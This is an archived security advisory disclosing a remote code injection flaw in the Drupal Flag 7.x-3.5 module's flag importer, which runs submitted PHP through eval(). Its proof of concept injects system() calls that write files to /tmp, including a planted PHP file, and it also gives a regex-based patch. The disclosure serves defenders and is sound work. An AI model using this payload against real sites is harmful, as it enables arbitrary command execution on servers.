accept no compromises

Drupal Flag 7.x-3.5 Command Execution

Drupal Flag 7.x-3.5 Command Execution
Posted May 9, 2014
Authored by Ubani Anthony Balogun

Drupal Flag version 7.x-3.5 suffers from a remote command injection vulnerability.

tags | exploit, remote
MD5 | 4dec17e80ff9188b8d4feb1b1da78b47

Drupal Flag 7.x-3.5 Command Execution

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Drupal Flag 7.x-3.5 Module Vulnerability Report

Author: Ubani Anthony Balogun <ubani@sas.upenn.edu>
Reported: May 07, 2014

Module Description:
- -------------------
Flag is a flexible flagging system that is completely customizable by
the administrator.
Using this module, the site administrator can provide any number of
flags for nodes, comments,
users, and any other type of entity. Some possibilities include
bookmarks, marking important,
friends, or flag as offensive. With extensive views integration, you
can create custom lists of
popular content or keep tabs on important content.

Description of Vulnerability:
- -----------------------------
The Flag 7.x-3.5 module contains an improper input handling (IH)
vulnerability created by it's failure to validate user
supplied PHP code, input via it's "flag importer" form, before using
PHP's "eval" function to execute the code on the server.
Using the flag importer form, a malicious user is able to execute
arbitrary code with the permissions of the server on the host machine.

Systems Impacted:
- ----------------
Drupal 7.26 with Flag 7.x-3.0 and Flag 7.x-3.5 (current recommended
release) were tested and found to be vulnerable

Impact:
- -------
Users with the permission to use the flag importer can inject and
execute arbitrary code on the host server with server permissions.
This vulnerability can be exploited to upload a malicious payload onto
the vulnerable server, mount a Denial of Service (DoS) attack
or effect other server-side attacks.


Mitigating Factors:
- -------------------
This vulnerability is mitigated by the fact that a user must have
permission to use the flag importer. The Flag module
deactivates this permission by default for users other than site
administrators, and cautions adminsitrators against granting
this permission to other roles.

Proof of Concept:
- -----------------
1. Install and enable the Flag module
2. Using an account with permissions to use the flag importer,
navigate to the flag import page (?q=admin/structure/flags/import)
and submit the below code via the "Flag import code" text area:

//Valid flag definition. This is required to successfully submit the
flag import form
$flags = array();
// Exported flag: "Bookmarks".
$flags['bookmarks'] = array (
'entity_type' => 'node',
'title' => 'Bookmarks',
'global' => '0',
'types' =>
array (
0 => 'article',
1 => 'page',
2 => 'people',
),
'flag_short' => 'Bookmark this',
'flag_long' => 'Add this post to your bookmarks',
'flag_message' => 'This post has been added to your bookmarks',
'unflag_short' => 'Unbookmark this',
'unflag_long' => 'Remove this post from your bookmarks',
'unflag_message' => 'This post has been removed from your bookmarks',
'unflag_denied_text' => '',
'link_type' => 'toggle',
'weight' => 0,
'show_in_links' =>
array (
'full' => 'full',
'teaser' => 'teaser',
'rss' => 'rss',
'search_index' => 'search_index',
'search_result' => 'search_result',
),
'show_as_field' => 1,
'show_on_form' => 1,
'access_author' => '',
'show_contextual_link' => 1,
'i18n' => 0,
'api_version' => 3,
);
// Malicious user input. Any amount of arbitrary code can be run after
here and before the "return flags" statement
system("whoami > /tmp/whoami.txt;");
system("echo \"<?php echo 'I p0wn Server now'; ?>\" >>
/tmp/do_evil.php;");
return $flags;

3. On the server machine, navigate to the /tmp directory to find the
created files "whoami.txt" and "do_evil.php".
"whoami.txt" contains the user who executed the code above
(server). "do_evil.php" contains the PHP code submitted
via the flag importer form above.
Note: This proof of concept assumes a linux server is being used. This
does not imply that non-linux systems are not
vulnerable.

Patch:
- ------
The following patch mitigates the vulnerability

- --- flag-7.x-3.5_vuln/flag/includes/flag.export.inc 2014-05-03
06:39:27.000000000 -0400
+++
/var/www/html/drupal-7.26/sites/all/modules/flag/includes/flag.export.inc
2014-05-07 12:28:19.780973535 -0400
@@ -99,8 +99,17 @@ function flag_import_form() {
*/
function flag_import_form_validate($form, &$form_state) {
$flags = array();
+
+ $code = $form_state['values']['import'];
+ $regex =
'#\b(?:(?!array)(?!flags\[))(\$)*([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\s*(\[.*|\(.*))#';
# Regular expression to catch function calls except array(), and
prevent all arrays that aren't of the form "flags[]" from being
created and used
+
+ if (preg_match($regex,$code,$match)){
+ form_set_error('import',t('The flag import failed because the
following function call was detected in the code: %func',
array('%func' => $match[0])));
+ return;
+ }
+
ob_start();
- - eval($form_state['values']['import']);
+ eval($code);
ob_end_clean();

if (!isset($flags) || !is_array($flags)) {


Vendor Response:
- ---------------------
The Drupal Security team was contacted on May 8, 2014 and responded
that because the permissions assignment page
carries the warning "Warning: Give to trusted roles only; this
permission has security implications." a coordinated
security fix and announcement is not warranted.

- --
Ubani Anthony Balogun
Information Security and Unix Services
University of Pennsylvania
School of Arts and Sciences
3600 Market St.
Suite 501
Philadelphia, PA 19104
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTbPv1AAoJEKwVbF01qrx/j74IALNB7cp+fbaFMWTTQcTWSunk
1lByAHMtowF+xaZTa0HV477jpTNH/TxgWp0Unck6RNiA9VL1EQ1tVwD7Zl9pH0x7
e0UlKkbFQLWDrgxy3McVX0Zd99StH64727psMECMQuaIHRLUvMT4qQLPhjKcd+8t
ikBSugPpPN8M+qmldiETurt7lA0khEPLGvep7k1x1FAtdqZB0D2s3CSmg5HT2TXu
toE4Roo6dKXxgASXrgHw3jUVQQy9AUlIrG+K/KjjWKQOaJbXH7foUzKt9pmCYunO
gjSZFHDru+7k2ScSGGWh+VP2Zs+seq5cIPydS8QawQX0T5fHfUine/sd+iyNvLc=
=jfw7
-----END PGP SIGNATURE-----


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    5 Files
  • 2
    Sep 2nd
    5 Files
  • 3
    Sep 3rd
    3 Files
  • 4
    Sep 4th
    13 Files
  • 5
    Sep 5th
    16 Files
  • 6
    Sep 6th
    15 Files
  • 7
    Sep 7th
    20 Files
  • 8
    Sep 8th
    16 Files
  • 9
    Sep 9th
    4 Files
  • 10
    Sep 10th
    2 Files
  • 11
    Sep 11th
    15 Files
  • 12
    Sep 12th
    19 Files
  • 13
    Sep 13th
    20 Files
  • 14
    Sep 14th
    38 Files
  • 15
    Sep 15th
    31 Files
  • 16
    Sep 16th
    1 Files
  • 17
    Sep 17th
    7 Files
  • 18
    Sep 18th
    15 Files
  • 19
    Sep 19th
    40 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    10 Files
  • 23
    Sep 23rd
    1 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close